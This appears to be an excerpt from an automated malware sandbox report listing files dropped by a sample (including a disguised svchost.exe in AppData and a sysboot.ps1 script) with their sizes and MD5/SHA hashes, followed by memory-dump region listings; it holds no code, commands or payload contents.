713ad359b75fe6d947468ec1825202b9

SHA1
19dcd19f18a2ad6deb581451aad724bd44a592a4

SHA256
56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

SHA512
4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

Filesize
226B

MD5
66aea5e724c4a224d092067c3381783b

SHA1
ee3cc64c4370a255391bdfeef2883d5b7a6e6230

SHA256
04b17cab961f973464bba8924f764edef6451d1774f2405d27ef33d164296923

SHA512
5d719e303f491d1443cb7c7e8946481e90532522a422c98f82466e1eddcd1ef24a4505dcbf75f2191fbb66825d3550566d7f408a3854edeb4c1a192c8c9a6d06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
f1e518cedf7506f68ca57e6d8359022b

SHA1
47a59f4fb45872b24444a79b1f0e1bde037f8d11

SHA256
830b9b11b8587d947b14989669afdc4d0c0e6c0d2f65eb92e07558f168ae3bfb

SHA512
c8f827ef3776bab1b0fea08ea267b3379bf73a82e9022bd1d4389e92134e1a008fa31aa261aa63224d26ad1ec7500272ee8044dccfe7e22f1eb205ef4e2e8910

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
55KB

MD5
58f931990104a18c6b7ed0e8deb6227d

SHA1
6dce3b0761acc212a387e96dcf2a3b2424a3d2d6

SHA256
c176d372f3b47f100947935603095f7f0e6ae367f622c0f0519158326e2bcdab

SHA512
72e48a9abaefe214f5dfe1c1a0472d3007a16c2a74409e13debbc46a44fc35c70cbe12c8f3ddb59da63b7f840a2231becdaf5576b67a22d889e562766b37edaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ff600a11837788c0a0c0dfb042faeb1d

SHA1
264f83ed27650fe65303cd2784ad8c8c12bb9867

SHA256
99a593e758745031b14cb0dadb698dc9c814d6c48b874c477d39fffa17553ad4

SHA512
b47c2cd9403c2dbe9d4accd3aae01474df26ef285200e15800ab5812092835c0655b5aec7d0acd1a43c9e4f0af58cf75b9ab92c9c8612a5abb1a772e0e794863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1add983babb1a08c6bf69d4b6e333222

SHA1
479c1d808e29d18df72533636f6f6f91b9dac81b

SHA256
294c66949e7ed8e1e8070e894628de249cb90f1e45f6a6ea32c0b38a550802b1

SHA512
d2791df10ae777600349f970cc9612d6f9e96b61af66376df759d4a64197a87b023bc48162a0606fcdb4fd608713b9b6d18f19f773b3c26a15ab462a153a4194

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4f5673a67a37d90d934c9183981457cf

SHA1
688f4caea166e59365cfae3a2f0b7ee79e9bbee5

SHA256
fcfa181b295d5598ecaafda45d59a94124e1078d3681df8317d453eaf86f4f85

SHA512
a1d49a2f1fa0adc3346516f30db0d143fb137d5b362b0fb924c4abbec7b973e0733950ae20029b049966eeafc10b33856fd534d73f66ae5a19f31451b9a23421

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c81f99eda10ee5c3ad554dc471977eb0

SHA1
9b5469e7a689a613d1e820cc2c085ea6a0c96c20

SHA256
5b3d3fcbe9428e98352a6e52f4a34c59535fc3226abf337bda9a6d5ba827d752

SHA512
bb49f27e4f93c2217f6bb9a51426c2240a22cadbf16df574fa43fb2f419efe8a1a2b6b00657e04d3aad989c299e2ea6d4194e8a5e3892f80e8852a77a92256f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2f7b4776b15ac31500bda5a04ff4cec3

SHA1
e2b1dc1c99ef6e738e58f549923b355ebc9ca299

SHA256
a04f4b1bf1eeed0ba3f381016be7497ef6d412b1ac0f9f4fd2bb3d2998a1aceb

SHA512
9281417f728bffcd88cfcb72d84ab3f952499faf1b84bfb00c42a722732ff59ee841b9241bcb1082f853aa414bd3a65587a4b05bd72d2b12293de62040195a3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d4f8e7fee106060563dcc9e47e4f38c

SHA1
533b0b33905ea8ce397d628585ec93d9124ee8b3

SHA256
4e4623fae557072913614ccba06317d48aa537993c957bfa414bfd9bfa69023b

SHA512
132ae7235caceea9c7004039ad1e01532c4d215e5f35da38703978db136e6e2cc01e6bc05b63a99c0b1b46621fd6fd99e8b8a1db65e9df8ac326487dc847414c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z0kd0ych.1el.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2D9.tmp.bat

Filesize
153B

MD5
08ee7dd07dbab177473238f76166f7ed

SHA1
e88676675d44f99e44d889e6b6bd1e3dbe705c4e

SHA256
d5572ba703ec6cf9adc9712573b09a1d58bcd3884c7122b81b7e2a5e1a4a6633

SHA512
66461c7bb048ea795b5811fdeb06c6a3bcf0891e0d4cdd34562b3eb44d61de707efd01ae95e2722d30503b6fb3403910d001d671ff5ff75553c606cff3f1ded1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB4C.tmp

Filesize
1KB

MD5
32119cb69ef7469b1c64684f63549be2

SHA1
91ce80663c2ef6ea1b8843293f8953c67b865d0c

SHA256
deb9d4ab65810655d7cd14943f1b3a197615243647af551124bdcc58d4b6e8ac

SHA512
7e3d15254f56875fa65916718be4533ae17b7173b6648a48e50b8790d9239acad9f11f1dc936bad149521599ffb5dbbc37ec04811abbfc8feafcc5fd3918187b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFF01.tmp

Filesize
1KB

MD5
9cb9f8ba5ba99c36d5ba7ee5a98f0bd9

SHA1
4bb53c5f5d4f208a4082b59b0c4b5185866cd874

SHA256
dd802183599f6403ef3ae4832781d6fa687765b45a1d19d2fba947c41a51ee3c

SHA512
eb8c9e078ba0b43d5256b7df4b4db16a45b954db118826b5629243025eeefa856e8c50d4451c13473290c2a707066c6bfa7173fc230daa13d87e7a4b7ec22f76

Download Submit
C:\Users\Admin\AppData\Local\svchost.exe

Filesize
46KB

MD5
f9e58cfff3f013e9a9e679154dc5e320

SHA1
e0ade5edcd0de118cac9a772d8455a29a01e5574

SHA256
af0eb856e782c2ebef04155a860ba81731f10ec95ae04df12e364deef807307a

SHA512
c25758bb8346839b7a7be3d2d3a496924fbeecabd1d7c8671bb75aa0c36ae905b0048ae48ffaad43175d017a5f71e5c0c7d6a300d1b17de85f869ae02fe3f080

Download Submit
C:\Users\Admin\AppData\Local\sysboot.ps1

Filesize
1KB

MD5
81f7df2e0aa206d331d8987c1035cef1

SHA1
51e8454a79b2f8127d96663c6a74f88b1f139f2a

SHA256
4d2b4b4d6950791e6bcd8715c970bf7e19a0e33530818a6f17f602c785b0ec6a

SHA512
6defa54b76c38545de4b3b031b25191ddf67ff5e95c7e0004305012d9c87c8ea6dde10e30f9d1caceb70ad7caef61063ddc6aec40c755be96b8e730d712b132d

Download Submit
memory/332-30-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/332-18-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/332-28-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/332-31-0x0000015EF68A0000-0x0000015EF7046000-memory.dmp

Filesize
7.6MB

Download
memory/332-35-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/440-104-0x00000000009D0000-0x00000000009EA000-memory.dmp

Filesize
104KB

Download
memory/2136-71-0x0000000000F00000-0x0000000000F12000-memory.dmp

Filesize
72KB

Download
memory/4284-89-0x0000000000850000-0x0000000000866000-memory.dmp

Filesize
88KB

Download
memory/4404-202-0x0000016E54730000-0x0000016E54738000-memory.dmp

Filesize
32KB

Download
memory/4404-205-0x0000016E57A60000-0x0000016E57A86000-memory.dmp

Filesize
152KB

Download
memory/4404-184-0x0000016E35910000-0x0000016E35948000-memory.dmp

Filesize
224KB

Download
memory/4404-185-0x0000016E54480000-0x0000016E544CA000-memory.dmp

Filesize
296KB

Download
memory/4404-186-0x0000016E54430000-0x0000016E5443E000-memory.dmp

Filesize
56KB

Download
memory/4404-187-0x0000016E544D0000-0x0000016E54508000-memory.dmp

Filesize
224KB

Download
memory/4404-192-0x0000016E54460000-0x0000016E54468000-memory.dmp

Filesize
32KB

Download
memory/4404-204-0x0000016E579E0000-0x0000016E579E8000-memory.dmp

Filesize
32KB

Download
memory/4404-203-0x0000016E54740000-0x0000016E54748000-memory.dmp

Filesize
32KB

Download
memory/4592-0-0x00007FFDB8C13000-0x00007FFDB8C15000-memory.dmp

Filesize
8KB

Download
memory/4592-16-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/4592-13-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/4592-12-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/4592-11-0x00007FFDB8C10000-0x00007FFDB96D2000-memory.dmp

Filesize
10.8MB

Download
memory/4592-1-0x0000027E46B30000-0x0000027E46B52000-memory.dmp

Filesize
136KB

Download
memory/4884-55-0x0000020D53190000-0x0000020D531D4000-memory.dmp

Filesize
272KB

Download
memory/4884-105-0x0000020D53500000-0x0000020D53576000-memory.dmp

Filesize
472KB

Download